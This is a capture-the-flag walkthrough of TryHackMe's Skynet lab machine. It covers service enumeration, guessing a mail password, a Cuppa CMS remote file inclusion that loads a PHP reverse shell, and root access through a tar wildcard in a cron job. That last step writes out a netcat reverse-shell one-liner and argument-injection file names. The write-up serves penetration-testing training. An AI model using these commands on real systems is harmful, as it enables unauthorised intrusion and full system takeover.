# TryHackMe Skynet writeup

[Skynet](https://tryhackme.com/room/skynet) is the fifth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path

### **Enumeration**

Let’s start with the `nmap` scan:

```bash
nmap -sC -sV -o nmap.txt <target_ip>

22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X 
143/tcp open  imap        Dovecot imapd
```

As there is a port `80` open, let’s also run the `gobuster`:

```bash
gobuster dir -u http://<target_ip> -w /usr/share/seclists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://<target_ip>
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 03:58:37 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
===============================================================
2020/10/19 03:58:57 Finished
===============================================================
```

We discovered `/squirrelmail` directory, but it required authorization.

Let’s enumerate more! We still have services that we didn’t check yet. What about `smb`?

```bash
smbmap -H  <target_ip>
[+] Guest session       IP: <target_ip>:445    Name: <target_ip>                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))
```

It seems that only `anonymous` is readable without authorization. It’s a good idea to check what is inside:

```bash
smbclient \\\\<target_ip>\\anonymous

smb: \> ls
  .                                   D        0  Wed Sep 18 00:41:20 2019
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019
  books                               D        0  Wed Sep 18 00:40:06 2019

9204224 blocks of size 1024. 5373504 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)

smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 00:42:16 2019
  ..                                  D        0  Wed Sep 18 00:41:20 2019
  log2.txt                            N        0  Wed Sep 18 00:42:13 2019
  log1.txt                            N      471  Wed Sep 18 00:41:59 2019
  log3.txt                            N        0  Wed Sep 18 00:42:16 2019
```

The content of `attention.txt` is:

```bash
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
```

Only `log1.txt` in the `\logs` is worth looking, as it contains a list of possible passwords:

```bash
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
```

A short sum-up of the enumeration phase:

* we have `milesdyson` as a potential username
    
* we have the list of potential passwords
    
* we have two places to try them out: `ssh` and `squirrel mail`
    

It less likely that `ssh` will be our way in, so let’s give `squirrel mail` a try.

Try to find the correct password for user `milesdyson` on `http://<target_ip>/squirrelmail/src/login.php`.

I used `Burp Suite` for that, `Hydra` would also do the trick, but you can do it manually, it will not take long. *wink*

Alright, we are in! Let’s check the emails.

One of them is very interesting, others are useless.

The email with the subject `Samba Password reset` will cough your eye immediately:

```bash
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
```

This email was sent from `skynet@skynet` to the `milesdyson`, so now we have the password from `smb` share!

Login to the `smb` with this password and look around.

You will find the file that pointing out that something interesting can be found at the `/45kra24zxs28v3yd`.

We didn’t find that directory in the `smb`, let’s check, maybe it’s on port `80`?

Navigate to the `http://<target_ip>/45kra24zxs28v3yd/` and check what’s there.

Not so useful, huh?

Fire up your `gobuster` one more time:

```bash
gobuster dir -u http://<target_ip>/45kra24zxs28v3yd/ -w /usr/share/seclists/Discovery/Web-Content/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://<target_ip>/45kra24zxs28v3yd/
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 04:21:37 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
===============================================================
2020/10/19 04:21:58 Finished
===============================================================
```

Yet another vector! The `/administrator` directory leads us to the login form of the `Cuppa CMS`. Unfortunately, the credentials that we already have will not work here.

Let’s look for other ways in.

We don’t know the version of the `Cuppa CMS`, but it will not harm anyone if we will check for the available exploits.

---

### **\&gt; Exploitation**

```bash
searchsploit cuppa

Cuppa CMS - '/alertConfigField.php' Local/Remote File | php/webapps/25971.txt
```

We have only one `RFI`. As we don’t have any other ideas, let’s try it out:

Grab a copy of `php-reverse-shell.php` from `PentestMonkey`, specify your IP and port.

Open `nc` listener:

```bash
sudo nc -nlvp 1337
```

Open the web server in the folder with your reverse shell:

```bash
 sudo python -m SimpleHTTPServer 80                                                                        
```

Finally, let’s trigger the exploit itself:

```bash
http://<target_ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<your_ip>/php-reverse-shell.php
```

Catch your shell!

You can upgrade your shell by

```bash
/usr/bin/script -qc /bin/bash /dev/null
```

---

### **\&gt; PrivEsc**

Transport your favorite tool for privilege escalations to the machine. As we already have `SimpleHTTPServer` on port `80` you can use it.

`cd` to the folder where you have access to writing (`/tmp` for instance) and download the tool.

I will use [Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration) this time:

```bash
www-data@skynet:/tmp$ wget http://<your_ip>/lse.sh
www-data@skynet:/tmp$ chmod +x lse.sh
www-data@skynet:/tmp$ ./lse.sh
```

`lse` has a great `-l` flag, which allows you to specify how many details will be shown. I can recommend starting without it, and if you will not find anything useful, run [`lse.sh`](http://lse.sh) again with `-l 1`, `-l 2` or `-l 3` accordingly.

You will eventually spot the `CRON` job is running on `/home/milesdyson/backups/backup.sh`. Let’s investigate:

```bash
www-data@skynet:/tmp$ ls -la /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17  2019 /home/milesdyson/backups/backup.sh

www-data@skynet:/tmp$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
```

So, we can’t edit the file, but what we can do, is the exploitation of the wildcard in the script.

You can read more about this vulnerability [here](https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/).

Navigate to the `/var/www/html` and do the following:

```bash
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
```

Wait for a `CRON` job to execute your [`shell.sh`](http://shell.sh).

Catch the root shell!

---

### **\&gt; Takeaway**

* Enumeration can easily take half of the time of work on the machine.
    
* “Connecting the dots” is a useful skill for penetration testing.
    
* Take your time with the exploitation of the `CRON` jobs, can take a while to be executed.
